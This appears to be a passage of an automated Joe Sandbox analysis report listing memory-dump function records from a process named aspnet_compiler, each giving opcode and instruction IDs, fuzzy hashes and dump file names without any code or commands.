                                                                                                                                                          • Instruction Fuzzy Hash: 69115A70542229ABEF65AB64CD52FE9B2B4AB04710F5041D4A798AA0E1DA709E81DF84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5fcdb45a159d27bc10a8d28a4812100ce3c5cffdb21a649c34f532664e1690e7
                                                                                                                                                          • Instruction ID: bdc7abf7e2c604ea049c8a712044af5c3309e957d066052b38b1fa17949918af
                                                                                                                                                          • Opcode Fuzzy Hash: 5fcdb45a159d27bc10a8d28a4812100ce3c5cffdb21a649c34f532664e1690e7
                                                                                                                                                          • Instruction Fuzzy Hash: D911177290011DABCB15DB94CC80DEFBBBCEF48254F054166A946E7211EA35AA55CBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                          • Instruction ID: fb01a35367130b4c819f4580ad999f0b39e11b90d81555c3eeb4a753c0204068
                                                                                                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                          • Instruction Fuzzy Hash: 89014132201201CBEF919AADD880A9BB7AABFC4300F4551A9ED808F247DB71CC81C390
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b68db0da2acac35548f964e47dd4ee9cbd05a16bf33dcfdb90b43df0f2022896
                                                                                                                                                          • Instruction ID: e6c482ad8f4daf288d1820ad0b2664b612c9aff4b727523b60f505b5d35aaff7
                                                                                                                                                          • Opcode Fuzzy Hash: b68db0da2acac35548f964e47dd4ee9cbd05a16bf33dcfdb90b43df0f2022896
                                                                                                                                                          • Instruction Fuzzy Hash: 6711A5376441459FD715CF59D800BA5BBF9FB6A314F088199E8858B315D732EC81CBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fd83fd570ecadec2c000e0627f4318833b3282bf35f425493d8104b841909630
                                                                                                                                                          • Instruction ID: 77dc2230232d4cc880a6ad03f0709496d5d874b89424aba2cf52898901e563c6
                                                                                                                                                          • Opcode Fuzzy Hash: fd83fd570ecadec2c000e0627f4318833b3282bf35f425493d8104b841909630
                                                                                                                                                          • Instruction Fuzzy Hash: A211E8B1A002499FCB04DFA9D551AAEBBF8FF58250F10806AB945E7351D674EE01CBA4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6b072746528d60d88262a2ddc8987c5bbd2b1a521353638604cd3d57c666d375
                                                                                                                                                          • Instruction ID: 1b8d0f23eb1c33a7dbd719f944d56050ab2d7077725239649ab2678104130a6d
                                                                                                                                                          • Opcode Fuzzy Hash: 6b072746528d60d88262a2ddc8987c5bbd2b1a521353638604cd3d57c666d375
                                                                                                                                                          • Instruction Fuzzy Hash: 1B0124310402119BC732AB29C501D7ABBF9FF52AA1B06847EE3D51BA21CB30EC41CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                          • Instruction ID: 21ebff95804049ce2a1fbcab00c5eb699d5e05b3cdc14f11c998ccd36297ce78
                                                                                                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                          • Instruction Fuzzy Hash: 72012832100705AFEB22E6B9C940EA777E9FFC5210F448469E6D68B940DE70E501CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 493df81d5c11e36206b7901ac439dd5e4bc7fe4eff7106c3bbda6b52fb3e7a88
                                                                                                                                                          • Instruction ID: 469b23b9b2f88fcfecf4313d2746b0d39f8adc7c79e26bcdbb74c15a0cd0408a
                                                                                                                                                          • Opcode Fuzzy Hash: 493df81d5c11e36206b7901ac439dd5e4bc7fe4eff7106c3bbda6b52fb3e7a88
                                                                                                                                                          • Instruction Fuzzy Hash: F2116D75A0020DEFDF05EFA4C960AAE7BB5EB54784F004059E9459B250E635AE11DB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9f0a7bcb7597d61ff7431265a9017e23f8f38b1cc5716b6260d977c23df51b13
                                                                                                                                                          • Instruction ID: 118fb4d0f7663c5ea02d10c4f40a1233e0516b98804a3a27305037e69b24de31
                                                                                                                                                          • Opcode Fuzzy Hash: 9f0a7bcb7597d61ff7431265a9017e23f8f38b1cc5716b6260d977c23df51b13
                                                                                                                                                          • Instruction Fuzzy Hash: DB01A7B12016467FD311BB79CD44E97B7ACFF55B647000529B14987551DB34EC11C6E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78ba6ee3f670b19177cb84d63e574b4207b63bcee841c477a1ee7f76f09c78d3
                                                                                                                                                          • Instruction ID: b9008924ff612bc5ed191d9f94221d19085298c0e1a6f27d274b5b0359806c3f
                                                                                                                                                          • Opcode Fuzzy Hash: 78ba6ee3f670b19177cb84d63e574b4207b63bcee841c477a1ee7f76f09c78d3
                                                                                                                                                          • Instruction Fuzzy Hash: 80014C326142029FC320DF7BD85C9ABBBE8FF64660F144529E9A887190E7319901CBD1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6d931dd848923d5ee2ca1445ec7b984742f6acd05b4d6a60ba079e4f7b5496ba
                                                                                                                                                          • Instruction ID: 757d410f88f0f06e44d7338b2255619a1f452d5a4e5e5f01b3a959ef6a9ec501
                                                                                                                                                          • Opcode Fuzzy Hash: 6d931dd848923d5ee2ca1445ec7b984742f6acd05b4d6a60ba079e4f7b5496ba
                                                                                                                                                          • Instruction Fuzzy Hash: 80115B75A0020DABDF15EFA8C954EEEBBB6FB58244F004059F94197340DA35EE11DB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 197351f0238c04b488de6cb6d1297789930bbee8d3624b4dc75c49ebe958f324
                                                                                                                                                          • Instruction ID: 5cd8adf8e227f74f005c1e60baebe7458559cdc5a54f2413c970ae036342e702
                                                                                                                                                          • Opcode Fuzzy Hash: 197351f0238c04b488de6cb6d1297789930bbee8d3624b4dc75c49ebe958f324
                                                                                                                                                          • Instruction Fuzzy Hash: F9118BB16093089FC700DF69D54199BBBE8FF98710F00851EFA98D7390E630E901CB92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 141519e1b2c4bb12d5d8d2fc5de48c9065da96e9ca001127bcf5644e5521a089
                                                                                                                                                          • Instruction ID: 34ebeb0988202ef3ac2d68f196d0127196389a065dc2f0b950bf5c1aae4cbadc
                                                                                                                                                          • Opcode Fuzzy Hash: 141519e1b2c4bb12d5d8d2fc5de48c9065da96e9ca001127bcf5644e5521a089
                                                                                                                                                          • Instruction Fuzzy Hash: C41157B16083089FC700DF69D54198BBBE8AF99750F00851EB998D73A0E630E901CB92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                          • Instruction ID: c4f1eea80b1a2fec630ace32384adecd486318f3e199fe72070a130393faef9f
                                                                                                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                          • Instruction Fuzzy Hash: B5014C32200601DFD729DA6DD840F93B7EAFFC1200F054419E6438BA90DBB4F860C794
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                          • Instruction ID: 74bdd7350844374e24b667a466204694791f4fa0e09112e2bac90585ba6262b0
                                                                                                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                          • Instruction Fuzzy Hash: DE017872304680DFE322D65DC948F6A7BECEB54794F0944E1FA89CBAA1D668DC80C661
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1b6b31b5e7b703b993fe6b526ff4cd387f40c7354c46e46eddaf7b59bdef9a79
                                                                                                                                                          • Instruction ID: 6a793f225c609ee213010b954d630ed2c53da7c4ff853a045523695fd531dcc4
                                                                                                                                                          • Opcode Fuzzy Hash: 1b6b31b5e7b703b993fe6b526ff4cd387f40c7354c46e46eddaf7b59bdef9a79
                                                                                                                                                          • Instruction Fuzzy Hash: 7E0184B1B106159BD718EBA9DA409AE77E9EF80610B15C47AD941A7640DE70D902C690
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 7d016fc5918096faab2d52e5c698f9237cfcda6bfe9f79bc1f0d9d16b8579e22
                                                                                                                                                          • Instruction ID: 37af593d820243bb6e8e29999ce222bd5d2aa51512a0a001c21c521de3202551
                                                                                                                                                          • Opcode Fuzzy Hash: 7d016fc5918096faab2d52e5c698f9237cfcda6bfe9f79bc1f0d9d16b8579e22
                                                                                                                                                          • Instruction Fuzzy Hash: EE012F71280A01AFD335AA09C901B42BBA8AF14F50F11442EA3869B7A0C7B09881CB94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0802da6ff58d8ef19ff30bb9f43e42e3e4d44634590a860d580d5a812192fcec
                                                                                                                                                          • Instruction ID: 5b11f1688f96820d4a2124c761a1ae887632a39be311043d7c8c5b7e2d42dc7e
                                                                                                                                                          • Opcode Fuzzy Hash: 0802da6ff58d8ef19ff30bb9f43e42e3e4d44634590a860d580d5a812192fcec
                                                                                                                                                          • Instruction Fuzzy Hash: F1F0F932641715B7C7369B568C40F477AADEF84B94F004028BA4597640C630DD01C7F0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                          • Instruction ID: 109a4005c02d52514ef26947b19c7ed18acaa35d665ed9a109b7a34cd8bc8a0d
                                                                                                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                          • Instruction Fuzzy Hash: C5F0C2B2A00A11ABE335CF4DDD40EA7FBEEDBD5A80F048168B555C7220EA31DD04CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                          • Instruction ID: 90f9657bdd25b19b9fc6ecebab6201d936b13b658140cbe7343c4130eec03f01
                                                                                                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                          • Instruction Fuzzy Hash: 26F04CB3207623ABF7321A9949C0B6BA5958FD1B65F194075F2899B200CA608D0193D0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                          • Instruction ID: ffbda84711303ee200ffea96ba67a31a78aa39f2c1f743acd615051607db7a40
                                                                                                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                          • Instruction Fuzzy Hash: FA01F9312046859BE322A71DD905F9EFFECEF51B54F0880AAFAD48F691DA75C900C664
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3c45d60857e64688ff071abeb674ef1271078d53f17cb0d4165d29dd1b0905c3
                                                                                                                                                          • Instruction ID: e34f3404fb0a82ce6c7e42c446cf3c78954aa2741b1cc3a07179ec499e159c42
                                                                                                                                                          • Opcode Fuzzy Hash: 3c45d60857e64688ff071abeb674ef1271078d53f17cb0d4165d29dd1b0905c3
                                                                                                                                                          • Instruction Fuzzy Hash: E1018F71A002599FCF04DFA9D851AEEBBF8BF58310F14405AF901EB280D734EA11CB94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                          • Instruction ID: a662816308868ace3ffeede929fc5495e8ccfe278c7e9e1a0a69447c84dd958c
                                                                                                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                          • Instruction Fuzzy Hash: B1F01D7220011DBFEF019F94DD80DEF7B7EEB592A8B104125FA1196160D636DD21ABA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7cf346009260bba5d3d460d4ceda9ce6808853c283b89a611e6c97d9a2e1e9c1
                                                                                                                                                          • Instruction ID: e4687658ac35402d31bae403ea8d8f62efd83db1f0aef119133cb96951b692ae
                                                                                                                                                          • Opcode Fuzzy Hash: 7cf346009260bba5d3d460d4ceda9ce6808853c283b89a611e6c97d9a2e1e9c1
                                                                                                                                                          • Instruction Fuzzy Hash: BA018536200209EBCF129E84D840EDE3FA6FB4C664F068111FE2866224C736D9B0EB81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 42c42e3a1fe64b3ba4469686ea4dd9f2ff9f03e51e55245e8a05f1a76c8e0f27
                                                                                                                                                          • Instruction ID: b96353815705f51a20249115f9c066b59c5fecdd32d4eefcf2a6df88f902668b
                                                                                                                                                          • Opcode Fuzzy Hash: 42c42e3a1fe64b3ba4469686ea4dd9f2ff9f03e51e55245e8a05f1a76c8e0f27
                                                                                                                                                          • Instruction Fuzzy Hash: B0F024B12052A19BF3909619DE81B6272D6EBD5750F2980BAEB858B2E1E9B1DC018394
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7ba36cf6ee71f98df585ea940c7502440bd6234d0f9adb704f5722c645ec4bf7
                                                                                                                                                          • Instruction ID: 975e4ae93e20a6ef7f4cdb00793f7d7e1cf61f27544b33e6a706112119b6f424
                                                                                                                                                          • Opcode Fuzzy Hash: 7ba36cf6ee71f98df585ea940c7502440bd6234d0f9adb704f5722c645ec4bf7
                                                                                                                                                          • Instruction Fuzzy Hash: FB01A4702046819BF363AB6CCD68F6E3BE8BB50F44F4941E4BAC1CB6E6D729D4418620
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                          • Instruction ID: 1caeb91c3cd64c8d8c6caf404038908f012744056385484dd470f9894d12697e
                                                                                                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                          • Instruction Fuzzy Hash: F9F0E935741D1347EBB6AA2D8851B2FB6D5DF90A40B05856C9FC1DBA80EF60D800C780
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                          • Instruction ID: afdb35512064736531c9beb3caf763a86519bb9eb6ff9aae8c821e7ae6257609
                                                                                                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                          • Instruction Fuzzy Hash: 44F05E327117529BE3219A4EDC81F16B7A8AFD5A60F6900B5A68C9F264C760EC0187E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3c93c0b6e4e0f7d7431ae7500571283997f7a06909759053b65522265d4a8ca9
                                                                                                                                                          • Instruction ID: c8c61fe9cd0db0c9a2831cb443cef896df8ba97e188ff9757ae3f3e3633bfaaf
                                                                                                                                                          • Opcode Fuzzy Hash: 3c93c0b6e4e0f7d7431ae7500571283997f7a06909759053b65522265d4a8ca9
                                                                                                                                                          • Instruction Fuzzy Hash: 19F08C706093449FD714EF68C952A1AB7E8EF98610F40865AB8D8DB390E634EA01CB96
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                          • Instruction ID: 72b7e6f5551a24a190c1e86fbe87b83992f04714ccaf027548bfd0ff67246dd7
                                                                                                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0B472614204EFE714EB25CC01F96B6E9EF9C340F148079A5C5D7174FAB1DD41C655
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 19d55c70d0685173a02cb9433ee2a896f314b54e8678fdeb941b673529eb8d61
                                                                                                                                                          • Instruction ID: 33c6d50604e55dd6de920911c905c6ca79d8acb15a2703353c48238b6cdf5d49
                                                                                                                                                          • Opcode Fuzzy Hash: 19d55c70d0685173a02cb9433ee2a896f314b54e8678fdeb941b673529eb8d61
                                                                                                                                                          • Instruction Fuzzy Hash: 78F06270A1124DDFDB04EFA9D625A9EB7F4FF58300F108069B995EB385DA34EA01CB94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
